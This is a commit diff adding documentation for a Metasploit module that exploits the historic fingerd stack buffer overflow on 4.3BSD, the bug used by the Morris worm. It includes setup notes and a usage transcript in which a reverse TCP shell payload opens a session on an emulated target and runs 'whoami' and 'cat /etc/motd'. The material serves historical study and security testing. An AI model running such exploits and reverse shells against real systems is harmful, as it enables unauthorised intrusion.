Add module doc and promise a Docker environment
parent
fa892d8eba
commit
114692ee56
|
@ -0,0 +1,77 @@
|
|||
## Intro
|
||||
|
||||
This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
|
||||
This vulnerability was exploited by the Morris worm in 1988-11-02.
|
||||
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
|
||||
|
||||
## Setup
|
||||
|
||||
For manual setup, please follow the Computer History Wiki's
|
||||
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
||||
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
||||
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
||||
|
||||
A Docker environment will be provided and referenced in this document.
|
||||
|
||||
## Targets
|
||||
|
||||
```
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**RPORT**
|
||||
|
||||
Set this to the target port. The default is 79 for `fingerd`, but the
|
||||
port may be forwarded when NAT (SLiRP) is used in SIMH.
|
||||
|
||||
**PAYLOAD**
|
||||
|
||||
Set this to a BSD VAX payload. Currently only
|
||||
`bsd/vax/shell_reverse_tcp` is supported.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > options
|
||||
|
||||
Module options (exploit/bsd/finger/morris_fingerd_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
|
||||
RPORT 79 yes The target port (TCP)
|
||||
|
||||
|
||||
Payload options (bsd/vax/shell_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
||||
|
||||
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] 127.0.0.1:79 - Connecting to fingerd
|
||||
[*] 127.0.0.1:79 - Sending 533-byte buffer
|
||||
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
|
||||
|
||||
whoami
|
||||
nobody
|
||||
cat /etc/motd
|
||||
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
|
||||
|
||||
Would you like to play a game?
|
||||
```
|
Loading…
Reference in New Issue